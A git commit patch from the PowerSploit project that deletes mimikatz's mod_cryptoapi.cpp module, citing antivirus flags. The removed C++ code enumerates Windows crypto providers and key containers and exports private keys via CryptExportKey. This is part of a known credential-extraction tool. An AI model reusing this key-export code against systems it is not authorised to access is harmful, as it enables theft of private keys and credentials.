From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001
From: mattifestation
Date: Mon, 3 Feb 2014 17:13:35 -0500
Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit.
---
 .../mimikatz-1.0/modules/mod_cryptoapi.cpp | 138 --------------------
 1 file changed, 138 deletions(-)
 delete mode 100644 Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp
(limited to 'Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp')
diff --git a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp b/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp
deleted file mode 100644
index f886f09..0000000
--- a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp
+++ /dev/null
@@ -1,138 +0,0 @@
-/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/
-#include "mod_cryptoapi.h"
-HMODULE mod_cryptoapi::hRsaEng = NULL;
-
-bool mod_cryptoapi::loadRsaEnh()
-{
- if(!hRsaEng)
- hRsaEng = LoadLibrary(L"rsaenh");
- return (hRsaEng != NULL);
-}
-
-bool mod_cryptoapi::unloadRsaEnh()
-{
- if(hRsaEng)
- FreeLibrary(hRsaEng);
- return true;
-}
-
-bool mod_cryptoapi::getProviderString(wstring ProviderName, wstring * Provider)
-{
- map mesProviders;
- mesProviders.insert(make_pair(L"MS_DEF_PROV", MS_DEF_PROV));
- mesProviders.insert(make_pair(L"MS_ENHANCED_PROV", MS_ENHANCED_PROV));
- mesProviders.insert(make_pair(L"MS_STRONG_PROV", MS_STRONG_PROV));
- mesProviders.insert(make_pair(L"MS_DEF_RSA_SIG_PROV", MS_DEF_RSA_SIG_PROV));
- mesProviders.insert(make_pair(L"MS_DEF_RSA_SCHANNEL_PROV", MS_DEF_RSA_SCHANNEL_PROV));
- mesProviders.insert(make_pair(L"MS_DEF_DSS_PROV", MS_DEF_DSS_PROV));
- mesProviders.insert(make_pair(L"MS_DEF_DSS_DH_PROV", MS_DEF_DSS_DH_PROV));
- mesProviders.insert(make_pair(L"MS_ENH_DSS_DH_PROV", MS_ENH_DSS_DH_PROV));
- mesProviders.insert(make_pair(L"MS_DEF_DH_SCHANNEL_PROV", MS_DEF_DH_SCHANNEL_PROV));
- mesProviders.insert(make_pair(L"MS_SCARD_PROV", MS_SCARD_PROV));
- mesProviders.insert(make_pair(L"MS_ENH_RSA_AES_PROV", MS_ENH_RSA_AES_PROV));
- mesProviders.insert(make_pair(L"MS_ENH_RSA_AES_PROV_XP", MS_ENH_RSA_AES_PROV_XP));
-
- map::iterator monIterateur = mesProviders.find(ProviderName);
- *Provider = (monIterateur != mesProviders.end()) ? 
monIterateur->second : ProviderName;
- return true;
-}
-
-bool mod_cryptoapi::getProviderTypeFromString(wstring ProviderTypeName, DWORD * ProviderType)
-{
- map mesTypes;
- mesTypes.insert(make_pair(L"PROV_RSA_FULL", PROV_RSA_FULL));
- mesTypes.insert(make_pair(L"PROV_RSA_SIG", PROV_RSA_SIG));
- mesTypes.insert(make_pair(L"PROV_DSS", PROV_DSS));
- mesTypes.insert(make_pair(L"PROV_FORTEZZA", PROV_FORTEZZA));
- mesTypes.insert(make_pair(L"PROV_MS_EXCHANGE", PROV_MS_EXCHANGE));
- mesTypes.insert(make_pair(L"PROV_SSL", PROV_SSL));
- mesTypes.insert(make_pair(L"PROV_RSA_SCHANNEL", PROV_RSA_SCHANNEL));
- mesTypes.insert(make_pair(L"PROV_DSS_DH", PROV_DSS_DH));
- mesTypes.insert(make_pair(L"PROV_EC_ECDSA_SIG", PROV_EC_ECDSA_SIG));
- mesTypes.insert(make_pair(L"PROV_EC_ECNRA_SIG", PROV_EC_ECNRA_SIG));
- mesTypes.insert(make_pair(L"PROV_EC_ECDSA_FULL",PROV_EC_ECDSA_FULL));
- mesTypes.insert(make_pair(L"PROV_EC_ECNRA_FULL",PROV_EC_ECNRA_FULL));
- mesTypes.insert(make_pair(L"PROV_DH_SCHANNEL", PROV_DH_SCHANNEL));
- mesTypes.insert(make_pair(L"PROV_SPYRUS_LYNKS", PROV_SPYRUS_LYNKS));
- mesTypes.insert(make_pair(L"PROV_RNG", PROV_RNG));
- mesTypes.insert(make_pair(L"PROV_INTEL_SEC", PROV_INTEL_SEC));
- mesTypes.insert(make_pair(L"PROV_REPLACE_OWF", PROV_REPLACE_OWF));
- mesTypes.insert(make_pair(L"PROV_RSA_AES", PROV_RSA_AES));
-
- map::iterator monIterateur = mesTypes.find(ProviderTypeName);
- if(monIterateur != mesTypes.end())
- {
- *ProviderType = monIterateur->second;
- return true;
- }
- else return false;
-}
-
-bool mod_cryptoapi::getVectorProviders(vector * monVectorProviders)
-{
- DWORD index = 0;
- DWORD provType;
- DWORD tailleRequise;
-
- while(CryptEnumProviders(index, NULL, 0, &provType, NULL, &tailleRequise))
- {
- wchar_t * monProvider = new wchar_t[tailleRequise];
- if(CryptEnumProviders(index, NULL, 0, &provType, monProvider, &tailleRequise))
- {
- monVectorProviders->push_back(monProvider);
- }
- delete[] monProvider;
- index++;
- }
- return (GetLastError() == 
ERROR_NO_MORE_ITEMS);
-}
-
-bool mod_cryptoapi::getVectorContainers(vector * monVectorContainers, bool isMachine, wstring provider, DWORD providerType)
-{
- bool reussite = false;
-
- HCRYPTPROV hCryptProv = NULL;
- if(CryptAcquireContext(&hCryptProv, NULL, provider.c_str(), providerType, CRYPT_VERIFYCONTEXT | (isMachine ? CRYPT_MACHINE_KEYSET : NULL)))
- {
- DWORD tailleRequise = 0;
- char * containerName = NULL;
- DWORD CRYPT_first_next = CRYPT_FIRST;
- bool success = false;
-
- success = (CryptGetProvParam(hCryptProv, PP_ENUMCONTAINERS, NULL, &tailleRequise, CRYPT_first_next) != 0);
- while(success)
- {
- containerName = new char[tailleRequise];
- if(success = (CryptGetProvParam(hCryptProv, PP_ENUMCONTAINERS, reinterpret_cast(containerName), &tailleRequise, CRYPT_first_next) != 0))
- {
- wstringstream resultat;
- resultat << containerName;
- monVectorContainers->push_back(resultat.str());
- }
- delete[] containerName;
- CRYPT_first_next = CRYPT_NEXT;
- }
- reussite = (GetLastError() == ERROR_NO_MORE_ITEMS);
- CryptReleaseContext(hCryptProv, 0);
- }
-
- return reussite;
-}
-
-bool mod_cryptoapi::getPrivateKey(HCRYPTKEY maCle, PBYTE * monExport, DWORD * tailleExport, DWORD dwBlobType)
-{
- bool reussite = false;
-
- if(CryptExportKey(maCle, NULL, dwBlobType, NULL, NULL, tailleExport))
- {
- *monExport = new BYTE[*tailleExport];
- if(!(reussite = (CryptExportKey(maCle, NULL, dwBlobType, NULL, *monExport, tailleExport) != 0)))
- delete[] monExport;
-
- }
- return reussite;
-}
\ No newline at end of file
-- 
cgit v1.2.3